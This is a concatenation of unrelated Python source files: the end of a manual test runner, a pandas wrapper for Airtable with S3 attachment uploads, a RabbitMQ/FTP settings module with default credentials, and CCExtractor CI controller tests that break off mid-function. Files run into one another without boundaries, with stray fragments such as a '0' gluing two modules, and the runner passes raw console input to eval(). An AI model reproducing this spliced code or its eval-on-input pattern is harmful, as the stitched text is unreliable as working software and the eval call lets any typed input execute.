exec(compile(open(filename).read(), filename, 'exec')) status = eval(input("Did the example run succesfully (1) or not (2)?")) if status == 1: results[filename] = ["PASSED", "WORKS"] elif status == 2: results[filename] = ["PASSED", "DOESN'T WORK"] else: print("Incorrect input") with open('testResults.json', 'w') as f: f.write(json.dumps(results, indent=1)) else: print("Incorrect command line arguments") from .airtable import Airtable import pandas as pd import os import numpy as np import boto3 import traceback import tempfile import datetime global context_table context_table = None class PandasAirtable(Airtable): '''Extends Airtable class from python-airtable-wrapper. Automatically authenticates API access. Includes methods to download tables to pandas DataFrame and to upload attachments to Airtable via S3. For details on parent: https://github.com/gtalarico/airtable-python-wrapper ''' def __init__(self, primary_key=None, *args, **kwargs): self._primary_key = primary_key self._df = None super().__init__(*args, **kwargs) @property def df(self): if self._df is None: self._df = self.to_df() return self._df @df.setter def df(self, df): self._df = df @property def primary_key(self): if self._primary_key is None: self._primary_key = self.df.columns[0] return self._primary_key def to_df(self): '''Returns pandas DataFrame of current table. Note that this is slow- takes several seconds for a table with 1000 records. ''' records = self.get_all() df = airtable_records_to_DataFrame(records) return df def get_all_flat(self): '''Same function as .get_all() but returns a list of flat dictionaries; i.e. the Airtable id is merged with the fields dictionary ''' flatrecs = list(self.to_df().reset_index().to_dict(orient='index').values()) return flatrecs def create_s3_client(self): '''Creates an s3 client. Relies on configured AWS cli i.e. credentials must be present at '~/.aws/credentials' Might be wise to remove this to make this class more readily usable by people without AWS capabilities ''' self.s3 = boto3.client('s3', region_name='us-west-1') def get_record_id(self, field_name, field_value): recs = self.search(field_name=field_name, field_value=field_value) if len(recs) == 1: return recs[0]['id'] elif len(recs) == 0: print('No matching records') elif len(recs) > 1: print('More than one matching record') def get(self, record_id, as_series=True): if as_series: series = airtable_record_to_Series(Airtable.get(self, record_id=record_id)) series.af.table = self return series else: return Airtable.get(self,record_id=record_id) def get_many(self, record_ids, as_df=True): records = [Airtable.get(self, record_id=record_id) for record_id in record_ids] if as_df: df = airtable_records_to_DataFrame(records) df.af.table = self return df else: return records def __enter__(self): global context_table context_table = self return self def __exit__(self, exc_type, exc_value, tb): global context_table context_table = None if exc_type is not None: traceback.print_exception(exc_type, exc_value, tb) # return False # uncomment to pass exception through return True def upsert(self, record_id, fields, typecast=True): try: assert record_id is not None return self.update(record_id=record_id, fields=fields, typecast=typecast) except: return self.insert(fields=fields, typecast=typecast) def robust_upsert(self, record_id, fields, typecast=True): try: assert record_id is not None return self.robust_update(record_id=record_id, fields=fields, typecast=typecast) except: return self.robust_insert(fields=fields, typecast=typecast) def robust_insert(self, fields, typecast=True): try: fields = {k:typecast_airtable_value(v) for k,v in fields.items()} return self.insert(fields, typecast=typecast) except: return self.insert_one_field_at_a_time(fields=fields, typecast=typecast) def robust_update(self, record_id, fields,typecast=True): fields = {k:typecast_airtable_value(v) for k,v in fields.items()} try: return self.update( record_id=record_id, fields=fields, typecast=True, ) except: return self.update_one_field_at_a_time(record_id, fields, typecast=typecast) def insert_one_field_at_a_time(self, fields, typecast=True): record = None for key,val in fields.items(): try: record = self.insert(fields={key:val}, typecast=typecast) except: pass if record is not None: break record_id = record['id'] return self.update_one_field_at_a_time(record_id, fields, typecast=typecast) def update_one_field_at_a_time(self, record_id, fields, typecast=True): outputs = {'fails':[]} for key,val in fields.items(): try: field = {key: val} record = self.update( record_id=record_id, fields=field, typecast=typecast, ) outputs.update(record) except: outputs['fails'].append({'fields':field}) return outputs def upload_attachment_to_airtable_via_s3( self, filepath, s3_bucket, s3_key, record_id, field_name, s3_url_lifetime=300, delete_local_file_when_done=False, keep_old_attachments=True, s3_client=None, ): ''' Uploads a file to an attachment field for a single Airtable record. Works by uploading file first to S3, creating a short-lived public URL pointing to the file in S3, and then sending that URL to Airtable. Arguments: filepath -- local path of file to upload. String or Path object s3_bucket -- S3 bucket where file will be uploaded. String s3_key -- S3 key where file will be uploaded. String record_id -- Airtable record to update e.g. 'rec010N7Tt4tWxXTm'. String field_name -- Airtable attachment field for upload. String s3_url_lifetime -- Lifetime of public S3 url in seconds. Int delete_local_file_when_done -- if True, deletes local file after upload delete_s3_file_when_done -- if True, deletes S3 copy after upload. BROKEN ''' if s3_client is None: s3_client = create_s3_client() s3_client.upload_file( filepath, s3_bucket, s3_key) url = s3_client.generate_presigned_url( 'get_object', Params={ 'Bucket': s3_bucket, 'Key': s3_key }, ExpiresIn=s3_url_lifetime ) attachments = None if keep_old_attachments: rec = self.get(record_id=record_id, as_series=False)['fields'] attachments = rec.get(field_name) # returns None if nothing is in this field if attachments is None: attachments = [] attachments.append({'url': url}) fields = {field_name: attachments} # needs to be dict inside list self.update( record_id=record_id, fields=fields ) if delete_local_file_when_done: os.remove(filepath) @pd.api.extensions.register_series_accessor('af') class AirRow: def __init__( self, series, table:PandasAirtable=None, record_id:str=None, primary_key:str=None, ): self.series = series self._table = table self._record_id = record_id self._primary_key = primary_key def __repr__(self): s = self.series.__repr__() return f'AirRow ({self.table_name}) \n{s}' @property def table(self): if context_table is not None: return context_table else: return self._table @table.setter def table(self, table): self._table = table @property def fields(self): return self.series.convert_dtypes().to_dict() @property def table_name(self): try: return self.table.table_name except: return 'None' @property def record_id(self): '''If you manually set the record_id attribute, it will keep that one otherwise it will use the name of the series if it looks like a record_id lastly, it will query Airtable on its primary key ''' if self._record_id is None: if self._check_if_name_is_rec_id(): return self.series.name else: return self.get_record_id(field_name=self.primary_key) else: return self._record_id @record_id.setter def record_id(self, record_id): self._record_id = record_id def _check_if_name_is_rec_id(self): name = self.series.name if name is None: return False try: if len(name) != 17: # airtable record_id length return False except TypeError: return False if name[:3] == 'rec': # starts with rec return True else: return False def get_record_id(self, field_name, table=None): if table is None: table = self.table return table.get_record_id(field_name=field_name, field_value=self.series[field_name]) @property def primary_key(self): '''If you manually set a primary key for this instance, it will keep using that to track its record_id otherwise, it will look at the primary key of the associated PandasAirtable and use that ''' if self._primary_key is None: self._primary_key = self.table.primary_key return self._primary_key @primary_key.setter def primary_key(self, primary_key): self._primary_key = primary_key def insert( self, field_names=None, airtable=None, robust=True, typecast=True, ): if airtable is None: airtable = self.table assert airtable is not None fields = self.fields if field_names is not None: fields = {k:v for k,v in fields.items() if k in field_names} if robust: record = airtable.robust_insert(fields, typecast=typecast) else: record = airtable.robust_insert(fields, typecast=typecast) self.record_id = record['id'] return record def update( self, field_names=None, airtable=None, robust=True, typecast=True, ): if airtable is None: airtable = self.table assert airtable is not None fields = self.fields if field_names is not None: fields = {k:v for k,v in fields.items() if k in field_names} if robust: record = airtable.robust_update(record_id=self.record_id, fields=fields,typecast=typecast) else: record = airtable.update(record_id=self.record_id, fields=fields, typecast=typecast) try: self.record_id = record['id'] return record except: print('Update failed') def delete( self, airtable=None, ): if airtable is None: airtable = self.table assert airtable is not None return airtable.delete(record_id=self.record_id) def upsert( self, field_names=None, airtable=None, robust=True, typecast=True ): if airtable is None: airtable = self.table assert airtable is not None fields = self.fields if field_names is not None: fields = {k:v for k,v in fields.items() if k in field_names} try: record_id = self.record_id except: record_id = None if robust: record = airtable.robust_upsert(record_id=record_id, fields=fields, typecast=typecast) else: record = airtable.upsert(record_id=record_id, fields=fields, typecast=typecast) return record @pd.api.extensions.register_dataframe_accessor('af') class AirDataFrame: def __init__( self, df, table:PandasAirtable=None, primary_key:str=None, ): self._df = df self._table = table self._primary_key = primary_key @property def df(self): if self._df is None: self.get() return self._df @df.setter def df(self, df): self._df = df @property def table_name(self): try: return self.table.table_name except: return 'None' @property def table(self): if context_table is not None: return context_table else: return self._table @table.setter def table(self, table): self._table = table @property def primary_key(self): '''By default - check associated table first, then use first column (bc DataFrame columns are more likely to be rearranged) ''' if self._primary_key is None: try: self._primary_key = self.table.primary_key except: self._primary_key = self.df.columns[0] return self._primary_key @primary_key.setter def primary_key(self, primary_key): self._primary_key = primary_key def look(self): 'Pulls data from Airtable but does not change the parent DataFrame' return self.table.to_df() def get(self): 'Pulls data from Airtable and reconstructs parent DataFrame' self._df = self.table.to_df() return self._reconstruct() def get_row(self, index): row = self.df.iloc[index] row.af.table = self.table row.af.primary_key = self.primary_key return row def _reconstruct(self): _df = pd.DataFrame(self._df) _df.af.table = self.table _df.af.primary_key = self.primary_key return _df def _prep_df(self, primary_key=None, airtable=None, index=None, columns=None, ): if airtable is None: airtable = self.table assert airtable is not None if primary_key is None: primary_key = self.primary_key df = self.df if columns is not None: df = df.loc[:, columns] if index is not None: df = df.loc[index, :] return airtable, primary_key, df def update(self, primary_key=None, airtable=None, index=None, columns=None, typecast=True, robust=True, ): airtable, primary_key, df = self._prep_df(primary_key=primary_key, airtable=airtable, index=index, columns=columns) records = [] for row_index, row in df.iterrows(): row.af.table = airtable if df.index.name == 'record_id': row.af.record_id = row_index else: row.af.primary_key = primary_key _rec = row.af.update(typecast=typecast, robust=robust) records.append(_rec) return records def insert(self, primary_key=None, airtable=None, index=None, columns=None, typecast=True, robust=True, ): airtable, primary_key, df = self._prep_df(primary_key=primary_key, airtable=airtable, index=index, columns=columns) records = [] for row_index, row in df.iterrows(): row.af.table = airtable row.af.primary_key = primary_key _rec = row.af.insert(typecast=typecast, robust=robust) records.append(_rec) return records def upsert(self, primary_key=None, airtable=None, index=None, columns=None, typecast=True, robust=True, ): airtable, primary_key, df = self._prep_df(primary_key=primary_key, airtable=airtable, index=index, columns=columns) records = [] for row_index, row in df.iterrows(): row.af.table = airtable if df.index.name == 'record_id': row.af.record_id = row_index else: row.af.primary_key = primary_key _rec = row.af.upsert(typecast=typecast, robust=robust) records.append(_rec) return records def delete(self, primary_key=None, airtable=None, index=None, columns=None ): airtable, primary_key, df = self._prep_df(primary_key=primary_key, airtable=airtable, index=index, columns=columns) records = [] for row_index, row in df.iterrows(): row.af.table = airtable if df.index.name == 'record_id': row.af.record_id = row_index else: row.af.primary_key = primary_key _rec = row.af.delete() records.append(_rec) return records def airtable_record_to_Series(record): return pd.Series(record['fields'], name=record['id']) def airtable_records_to_DataFrame(records): df = pd.DataFrame.from_records((r['fields'] for r in records), index=[ record['id'] for record in records]) df.index.name = 'record_id' return df def create_s3_client(region_name='us-west-1'): '''Creates an s3 client. Relies on configured AWS cli i.e. credentials must be present at '~/.aws/credentials' Might be wise to remove this to make this class more readily usable by people without AWS capabilities ''' return boto3.client('s3', region_name=region_name) def upload_attachment_to_airtable_via_s3( airtable, filepath, s3_key, record_id, field_name, s3_bucket=None, s3_url_lifetime=300, delete_local_file_when_done=False, delete_s3_file_when_done=False, keep_old_attachments=True, s3_client=None, ): ''' Uploads a file to an attachment field for a single Airtable record. Works by uploading file first to S3, creating a short-lived public URL pointing to the file in S3, and then sending that URL to Airtable. There's a potential security hazard here - the public URL is accessible to anyone who knows where to look for it during its short lifetime. It might be possible to restrict access to certain IPs if we can figure out what Airtable's IP address is. On the to-do list. Arguments: filepath -- local path of file to upload. String or Path object s3_bucket -- S3 bucket where file will be uploaded. String s3_key -- S3 key where file will be uploaded. String record_id -- Airtable record to update e.g. 'rec010N7Tt4tWxXTm'. String field_name -- Airtable attachment field for upload. String s3_url_lifetime -- Lifetime of public S3 url in seconds. Int delete_local_file_when_done -- if True, deletes local file after upload delete_s3_file_when_done -- if True, deletes S3 copy after upload. BROKEN ''' if s3_client is None: s3_client = create_s3_client() if not s3_bucket: s3_bucket = os.environ['TEMP_FILES_BUCKET'] s3_client.upload_file( filepath, s3_bucket, s3_key) url = s3_client.generate_presigned_url( 'get_object', Params={ 'Bucket': s3_bucket, 'Key': s3_key }, ExpiresIn=s3_url_lifetime ) attachments = None if keep_old_attachments: rec = airtable.get(record_id=record_id, as_series=False)['fields'] attachments = rec.get(field_name) # returns None if nothing is in this field if attachments == None: attachments = [] attachments.append({'url': url}) fields = {field_name: attachments} # needs to be dict inside list airtable.update( record_id=record_id, fields=fields ) if delete_local_file_when_done: os.remove(filepath) if delete_s3_file_when_done: # turning this on stops things from getting into airtable - # they appear quickly then are deleted. maybe it is too fast? s3_client.delete_object( Bucket=s3_bucket, Key=s3_key ) def typecast_airtable_value(value): if isinstance(value, list): return value elif isinstance(value, np.int64): return int(value) # elif value is None: # return '' elif pd.isna(value): return None else: return value def upload_df_to_airtable( airtable, df, primary_key='id', overwrite=False, try_one_field_at_a_time=False ): """upload pandas DataFrame to airtable Args: df (pandas DataFrame): should match format of airtable primary_key (str): primary key on airtable (first column). Defaults to 'id'. overwrite (bool): if yes, this runs an upsert. Defaults to False. try_one_field_at_a_time (bool, optional): can sometimes solve problems. Defaults to False. """ for i, row in df.iterrows(): upload_Series_to_airtable(airtable, row, primary_key, overwrite, try_one_field_at_a_time) def upload_Series_to_airtable( airtable, data: pd.Series, primary_key='id', overwrite=False, try_one_field_at_a_time=False, ): """upload pandas series to airtable Args: df_row (row of pandas Dataframe i.e. a Series): primary_key (str): primary key on airtable (first column). Defaults to 'id'. overwrite (bool): if yes, this runs an upsert. Defaults to False. try_one_field_at_a_time (bool, optional): can sometimes solve problems. Defaults to False. """ fields = data.to_dict() clean_fields = {} for key, value in fields.items(): # airtable doesnt like numpy ints clean_fields[key] = typecast_airtable_value(value) fields = clean_fields matching_recs = airtable.search( field_name=primary_key, field_value=fields[primary_key]) failed_to_upload = False if matching_recs: if len(matching_recs) > 1: print('WARNING: POSSIBLE DUPLICATE RECORDS IN AIRTABLE') if not overwrite: print(''' Warning: this experiment is already present in self Set overwrite=True if you want to overwrite ''') elif overwrite: try: record_id = matching_recs[0]['id'] airtable.update( record_id=record_id, fields=fields, typecast=True, ) except: failed_to_upload = True print('Upload to Airtable failed') if failed_to_upload & try_one_field_at_a_time: print('Trying to upload one field at a time') for key, value in fields.items(): try: record_id = matching_recs[0]['id'] airtable.update( record_id=record_id, fields={key: value}, typecast=True, ) except: print('Unable to upload ' + key) elif not matching_recs: try: airtable.insert( fields=fields, typecast=True, ) except: print('Upload to Airtable failed') if try_one_field_at_a_time: print('Trying to upload one field at a time') airtable.insert( fields={primary_key:fields[primary_key]}, typecast=True, ) matching_rec = airtable.match( field_name=primary_key, field_value=fields[primary_key]) record_id = matching_rec['id'] for key, value in fields.items(): try: airtable.update( record_id=record_id, fields={key: value}, typecast=True, ) except: print('Unable to upload ' + key) def unpack_list_field(x, delimiter=','): if len(x) == 1: try: return x[0] except: return x else: try: return delimiter.join(x) except: return x class AirtableAttachment(object): def __init__( self, filepath=None, record: AirRow = None, field_name=None, **kwargs ): self._filepath = filepath self._field_name = field_name self._record = record @property def filepath(self): return self._filepath @property def record(self): return self._record @property def record_id(self): return self.record.record_id def upload_to_airtable( self, filepath=None, field_name=None, airtable=None, record_id=None, s3_key=None, s3_bucket=None, keep_old_attachments=True, ): if airtable is None: airtable = self.record.table if filepath is None: filepath = self.filepath if record_id is None: record_id = self.record_id if field_name is None: field_name = self._field_name if s3_key is None: now = datetime.datetime.now() nowstr = now.isoformat().replace(':','_').replace('.','_') s3_key = f'temp_imgs/{nowstr}.png' airtable.upload_attachment_to_airtable_via_s3( filepath=filepath, s3_key=s3_key, record_id=record_id, s3_bucket=s3_bucket, field_name=field_name, keep_old_attachments=keep_old_attachments, ) @classmethod def from_matplotlib_figure( cls, figure, format='png', dpi=300, bbox_inches='tight', savefig_kwargs=None, **kwargs): if savefig_kwargs is None: savefig_kwargs = {} with tempfile.NamedTemporaryFile() as tmp: figure.savefig(tmp, format=format, dpi=dpi, bbox_inches=bbox_inches, **savefig_kwargs) return cls(filepath=tmp.name **kwargs) class AuthenticatedPandasAirtable(PandasAirtable): def retrieve_secrets(self): return None # overwrite this def __init__( self, table_name, base_key=None, api_key=None, *args, **kwargs, ): '''subclass me with your own methods for getting secrets ''' self._cred = None if (base_key is None) or (api_key is None): self._cred = self.retrieve_secrets() self._cred.get_defaults() if base_key is None: base_key = os.environ[self._cred.base_key_name] if api_key is None: api_key = os.environ[self._cred.api_key_name] super().__init__(table_name=table_name, base_key=base_key, api_key=api_key, *args, **kwargs)0 import logging import os from structlog import wrap_logger LOGGING_LEVEL = logging.getLevelName(os.getenv("LOGGING_LEVEL", "DEBUG")) LOGGING_FORMAT = "%(asctime)s.%(msecs)06dZ|%(levelname)s: sdx-downstream: %(message)s" logger = wrap_logger(logging.getLogger(__name__)) def _get_value(key, default_value=None): """Gets a value from an environment variable , will use default if present else raise a value Error """ value = os.getenv(key, default_value) if not value: logger.error(f"No value set for {key}") raise ValueError() return value RABBIT_URL = 'amqp://{user}:{password}@{hostname}:{port}/%2f'.format( hostname=_get_value('RABBITMQ_HOST', 'rabbit'), port=_get_value('RABBITMQ_PORT', 5672), user=_get_value('RABBITMQ_DEFAULT_USER', 'rabbit'), password=_get_value('RABBITMQ_DEFAULT_PASS', 'rabbit') ) RABBIT_URLS = [RABBIT_URL] RABBIT_QUEUE = 'sdx_downstream' RABBIT_EXCHANGE = 'message' RABBIT_QUARANTINE_QUEUE = os.getenv('RABBIT_QUARANTINE_QUEUE', 'sdx-downstream-quarantine') FTP_HOST = _get_value('FTP_HOST', 'pure-ftpd') FTP_USER = os.getenv('FTP_USER') FTP_PASS = os.getenv('FTP_PASS') FTP_FOLDER = '/' FTP_FEEDBACK_FOLDER = '/EDC_QFeedback' SDX_STORE_URL = _get_value("SDX_STORE_URL", "http://sdx-store:5000") SDX_TRANSFORM_CS_URL = _get_value("SDX_TRANSFORM_CS_URL", "http://sdx-transform-cs:5000") SDX_SEQUENCE_URL = _get_value("SDX_SEQUENCE_URL", "http://sdx-sequence:5000") tests/test_ci/TestControllers.py from mock import mock from tests.base import BaseTestCase, MockRequests from mod_home.models import CCExtractorVersion, GeneralData from mod_test.models import Test, TestPlatform, TestType from mod_regression.models import RegressionTest from mod_customized.models import CustomizedTest from mod_ci.models import BlockedUsers from mod_auth.models import Role from werkzeug.datastructures import Headers from importlib import reload from flask import g class TestControllers(BaseTestCase): @mock.patch('github.GitHub') def test_comments_successfully_in_passed_pr_test(self, git_mock): import mod_ci.controllers reload(mod_ci.controllers) from mod_ci.controllers import comment_pr, Status # Comment on test that passes all regression tests comment_pr(1, Status.SUCCESS, 1, 'linux') git_mock.assert_called_with(access_token=g.github['bot_token']) git_mock(access_token=g.github['bot_token']).repos.assert_called_with(g.github['repository_owner']) git_mock(access_token=g.github['bot_token']).repos( g.github['repository_owner']).assert_called_with(g.github['repository']) repository = git_mock(access_token=g.github['bot_token']).repos( g.github['repository_owner'])(g.github['repository']) repository.issues.assert_called_with(1) pull_request = repository.issues(1) pull_request.comments.assert_called_with() new_comment = pull_request.comments() args, kwargs = new_comment.post.call_args message = kwargs['body'] if "passed" not in message: assert False, "Message not Correct" @mock.patch('github.GitHub') def test_comments_successfuly_in_failed_pr_test(self, git_mock): import mod_ci.controllers reload(mod_ci.controllers) from mod_ci.controllers import comment_pr, Status repository = git_mock(access_token=g.github['bot_token']).repos( g.github['repository_owner'])(g.github['repository']) pull_request = repository.issues(1) message = ('CCExtractor CI platform finished running the ' 'test files on linux. Below is a summary of the test results') pull_request.comments().get.return_value = [{'user': {'login': g.github['bot_name']}, 'id': 1, 'body': message}] # Comment on test that fails some/all regression tests comment_pr(2, Status.FAILURE, 1, 'linux') pull_request = repository.issues(1) pull_request.comments.assert_called_with(1) new_comment = pull_request.comments(1) args, kwargs = new_comment.post.call_args message = kwargs['body'] reg_tests = RegressionTest.query.all() flag = False for reg_test in reg_tests: if reg_test.command not in message: flag = True if flag: assert False, "Message not Correct" def test_check_main_repo_returns_in_false_url(self): from mod_ci.controllers import check_main_repo assert check_main_repo('random_user/random_repo') is False assert check_main_repo('test_owner/test_repo') is True @mock.patch('github.GitHub') @mock.patch('git.Repo') @mock.patch('libvirt.open') @mock.patch('shutil.rmtree') @mock.patch('mod_ci.controllers.open') @mock.patch('lxml.etree') def test_customize_tests_run_on_fork_if_no_remote(self, mock_etree, mock_open, mock_rmtree, mock_libvirt, mock_repo, mock_git): self.create_user_with_role( self.user.name, self.user.email, self.user.password, Role.tester) self.create_forktest("own-fork-commit", TestPlatform.linux) import mod_ci.cron import mod_ci.controllers reload(mod_ci.cron) reload(mod_ci.controllers) from mod_ci.cron import cron conn = mock_libvirt() vm = conn.lookupByName() import libvirt # mocking the libvirt kvm to shut down vm.info.return_value = [libvirt.VIR_DOMAIN_SHUTOFF] # Setting current snapshot of libvirt vm.hasCurrentSnapshot.return_value = 1 repo = mock_repo() origin = repo.create_remote() from collections import namedtuple GitPullInfo = namedtuple('GitPullInfo', 'flags') pull_info = GitPullInfo(flags=0) origin.pull.return_value = [pull_info] cron() fork_url = ('https://github.com/{user}/{repo}.git').format( user=self.user.name, repo=g.github['repository']) repo.create_remote.assert_called_with('fork_2', url=fork_url) repo.create_head.assert_called_with('CI_Branch', origin.refs.master) @mock.patch('github.GitHub') @mock.patch('git.Repo') @mock.patch('libvirt.open') @mock.patch('shutil.rmtree') @mock.patch('mod_ci.controllers.open') @mock.patch('lxml.etree') def test_customize_tests_run_on_fork_if_remote_exist(self, mock_etree, mock_open, mock_rmtree, mock_libvirt, mock_repo, mock_git): self.create_user_with_role( self.user.name, self.user.email, self.user.password, Role.tester) self.create_forktest("own-fork-commit", TestPlatform.linux) import mod_ci.cron import mod_ci.controllers reload(mod_ci.cron) reload(mod_ci.controllers) from mod_ci.cron import cron conn = mock_libvirt() vm = conn.lookupByName() import libvirt # mocking the libvirt kvm to shut down vm.info.return_value = [libvirt.VIR_DOMAIN_SHUTOFF] # Setting current snapshot of libvirt vm.hasCurrentSnapshot.return_value = 1 repo = mock_repo() origin = repo.remote() from collections import namedtuple Remotes = namedtuple('Remotes', 'name') repo.remotes = [Remotes(name='fork_2')] GitPullInfo = namedtuple('GitPullInfo', 'flags') pull_info = GitPullInfo(flags=0) origin.pull.return_value = [pull_info] cron() fork_url = ('https://github.com/{user}/{repo}.git').format( user=self.user.name, repo=g.github['repository']) repo.remote.assert_called_with('fork_2') @mock.patch('github.GitHub') @mock.patch('git.Repo') @mock.patch('libvirt.open') @mock.patch('shutil.rmtree') @mock.patch('mod_ci.controllers.open') @mock.patch('lxml.etree') def test_customize_tests_run_on_selected_regression_tests(self, mock_etree, mock_open, mock_rmtree, mock_libvirt, mock_repo, mock_git): self.create_user_with_role( self.user.name, self.user.email, self.user.password, Role.tester) self.create_forktest("own-fork-commit", TestPlatform.linux, regression_tests=[2]) import mod_ci.cron import mod_ci.controllers reload(mod_ci.cron) reload(mod_ci.controllers) from mod_ci.cron import cron conn = mock_libvirt() vm = conn.lookupByName() import libvirt vm.info.return_value = [libvirt.VIR_DOMAIN_SHUTOFF] vm.hasCurrentSnapshot.return_value = 1 repo = mock_repo() origin = repo.remote() from collections import namedtuple Remotes = namedtuple('Remotes', 'name') repo.remotes = [Remotes(name='fork_2')] GitPullInfo = namedtuple('GitPullInfo', 'flags') pull_info = GitPullInfo(flags=0) origin.pull.return_value = [pull_info] single_test = mock_etree.Element('tests') mock_etree.Element.return_value = single_test cron() mock_etree.SubElement.assert_any_call(single_test, 'entry', id=str(2)) assert (single_test, 'entry', str(1)) not in mock_etree.call_args_list def test_customizedtest_added_to_queue(self): regression_test = RegressionTest.query.filter(RegressionTest.id == 1).first() regression_test.active = False g.db.add(regression_test) g.db.commit() import mod_ci.controllers reload(mod_ci.controllers) from mod_ci.controllers import queue_test queue_test(g.db, None, 'customizedcommitcheck', TestType.commit) test = Test.query.filter(Test.id == 3).first() customized_test = test.get_customized_regressiontests() self.assertIn(2, customized_test) self.assertNotIn(1, customized_test) @mock.patch('mailer.Mailer') def test_inform_mailing_list(self, mock_email): """ Test the inform_mailing_list function """ from mod_ci.controllers import inform_mailing_list from mailer import Mailer email = inform_mailing_list(mock_email, "matejmecka", "2430", "Some random string", "Lorem Ipsum sit dolor amet...") mock_email.send_simple_message.assert_called_once_with( { 'text': '2430 - Some random string\n\n' ' Link to Issue: https://www.github.com/test_owner/test_repo/issues/matejmecka\n\n' ' Some random string(https://github.com/Some random string)\n\n\n' ' Lorem Ipsum sit dolor amet...\n ', 'subject': 'GitHub Issue #matejmecka', 'to': '' } ) @mock.patch('requests.get', side_effect=MockRequests) def test_add_blocked_users(self, mock_request): """ Check adding a user to block list. """ self.create_user_with_role( self.user.name, self.user.email, self.user.password, Role.admin) with self.app.test_client() as c: response = c.post( '/account/login', data=self.create_login_form_data(self.user.email, self.user.password)) response = c.post( '/blocked_users', data=dict(user_id=1, comment="Bad user", add=True)) self.assertNotEqual(BlockedUsers.query.filter(BlockedUsers.user_id == 1).first(), None) with c.session_transaction() as session: flash_message = dict(session['_flashes']).get('message') self.assertEqual(flash_message, "User blocked successfully.") @mock.patch('requests.get', side_effect=MockRequests) def test_add_blocked_users_wrong_id(self, mock_request): """ Check adding invalid user id to block list. """ self.create_user_with_role( self.user.name, self.user.email, self.user.password, Role.admin) with self.app.test_client() as c: response = c.post( '/account/login', data=self.create_login_form_data(self.user.email, self.user.password)) response = c.post( '/blocked_users', data=dict(user_id=0, comment="Bad user", add=True)) self.assertEqual(BlockedUsers.query.filter(BlockedUsers.user_id == 0).first(), None) self.assertIn("GitHub User ID not filled in", str(response.data)) @mock.patch('requests.get', side_effect=MockRequests) def test_add_blocked_users_empty_id(self, mock_request): """ Check adding blank user id to block list. """ self.create_user_with_role( self.user.name, self.user.email, self.user.password, Role.admin) with self.app.test_client() as c: response = c.post( '/account/login', data=self.create_login_form_data(self.user.email, self.user.password)) response = c.post( '/blocked_users', data=dict(comment="Bad user", add=True)) self.assertEqual(BlockedUsers.query.filter(BlockedUsers.user_id == None).first(), None) self.assertIn("GitHub User ID not filled in", str(response.data)) @mock.patch('requests.get', side_effect=MockRequests) def test_add_blocked_users_already_exists(self, mock_request): """ Check adding existing blocked user again. """ self.create_user_with_role( self.user.name, self.user.email, self.user.password, Role.admin) with self.app.test_client() as c: response = c.post( '/account/login', data=self.create_login_form_data(self.user.email, self.user.password)) blocked_user = BlockedUsers(1, "Bad user") g.db.add(blocked_user) g.db.commit() response = c.post( '/blocked_users', data=dict(user_id=1, comment="Bad user", add=True)) with c.session_transaction() as session: flash_message = dict(session['_flashes']).get('message') self.assertEqual(flash_message, "User already blocked.") @mock.patch('requests.get', side_effect=MockRequests) def test_remove_blocked_users(self, mock_request): """ Check removing user from block list. """ self.create_user_with_role( self.user.name, self.user.email, self.user.password, Role.admin) with self.app.test_client() as c: response = c.post( '/account/login', data=self.create_login_form_data(self.user.email, self.user.password)) blocked_user = BlockedUsers(1, "Bad user") g.db.add(blocked_user) g.db.commit() self.assertNotEqual(BlockedUsers.query.filter(BlockedUsers.comment == "Bad user").first(), None) response = c.post( '/blocked_users', data=dict(user_id=1, remove=True)) self.assertEqual(BlockedUsers.query.filter(BlockedUsers.user_id == 1).first(), None) with c.session_transaction() as session: flash_message = dict(session['_flashes']).get('message') self.assertEqual(flash_message, "User removed successfully.") @mock.patch('requests.get', side_effect=MockRequests) def test_remove_blocked_users_wrong_id(self, mock_request): """ Check removing non existing id from block list. """ self.create_user_with_role( self.user.name, self.user.email, self.user.password, Role.admin) with self.app.test_client() as c: response = c.post( '/account/login', data=self.create_login_form_data(self.user.email, self.user.password)) response = c.post( '/blocked_users', data=dict(user_id=7355608, remove=True)) with c.session_transaction() as session: flash_message = dict(session['_flashes']).get('message') self.assertEqual(flash_message, "No such user in Blacklist") @mock.patch('requests.get', side_effect=MockRequests) def test_remove_blocked_users_empty_id(self, mock_request): """ Check removing blank user id from block list. """ self.create_user_with_role( self.user.name, self.user.email, self.user.password, Role.admin) with self.app.test_client() as c: response = c.post( '/account/login', data=self.create_login_form_data(self.user.email, self.user.password)) response = c.post( '/blocked_users', data=dict(remove=True)) self.assertIn("GitHub User ID not filled in", str(response.data)) @mock.patch('requests.get', side_effect=MockRequests) def test_webhook_wrong_url(self, mock_request): """ Check webhook fails when ping with wrong url """ import json with self.app.test_client() as c: data = {'release': {'prerelease': False, 'published_at': '2018-05-30T20:18:44Z', 'tag_name': '0.0.1'}} sig = self.generate_signature(str(json.dumps(data)).encode('utf-8'), g.github['ci_key']) headers = self.generate_git_api_header('ping', sig) # non github ip address wsgi_environment = {'REMOTE_ADDR': '0.0.0.0'} response = c.post( '/start-ci', environ_overrides=wsgi_environment, data=json.dumps(data), headers=headers) self.assertNotEqual(response.status_code, 200) @mock.patch('requests.get', side_effect=MockRequests) def test_webhook_ping(self, mock_request): """ Check webhook release update CCExtractor Version """ import json with self.app.test_client() as c: data = {'release': {'prerelease': False, 'published_at': '2018-05-30T20:18:44Z', 'tag_name': '0.0.1'}} sig = self.generate_signature(str(json.dumps(data)).encode('utf-8'), g.github['ci_key']) headers = self.generate_git_api_header('ping', sig) # one of ip address from github webhook wsgi_environment = {'REMOTE_ADDR': '192.168.3.11'} response = c.post( '/start-ci', environ_overrides=wsgi_environment, data=json.dumps(data), headers=headers) self.assertEqual(response.status_code, 200) self.assertEqual(response.data, b'{"msg": "Hi!"}') @mock.patch('requests.get', side_effect=MockRequests) def test_webhook_release(self, mock_request): """ Check webhook release update CCExtractor Version """ import json with self.app.test_client() as c: # Full Release with version with 2.1 data = {'release': {'prerelease': False, 'published_at': '2018-05-30T20:18:44Z', 'tag_name': 'v2.1'}} sig = self.generate_signature(str(json.dumps(data)).encode('utf-8'), g.github['ci_key']) headers = self.generate_git_api_header('release', sig) # one of ip address from github webhook wsgi_environment = {'REMOTE_ADDR': '192.168.3.11'} last_commit = GeneralData.query.filter(GeneralData.key == 'last_commit').first() # abcdefgh is the new commit after previous version defined in base.py last_commit.value = 'abcdefgh' g.db.commit() response = c.post( '/start-ci', environ_overrides=wsgi_environment, data=json.dumps(data), headers=headers) last_release = CCExtractorVersion.query.order_by(CCExtractorVersion.released.desc()).first() self.assertEqual(last_release.version, '2.1') @mock.patch('requests.get', side_effect=MockRequests) def test_webhook_prerelease(self, mock_request): """ Check webhook release update CCExtractor Version """ import json with self.app.test_client() as c: # Full 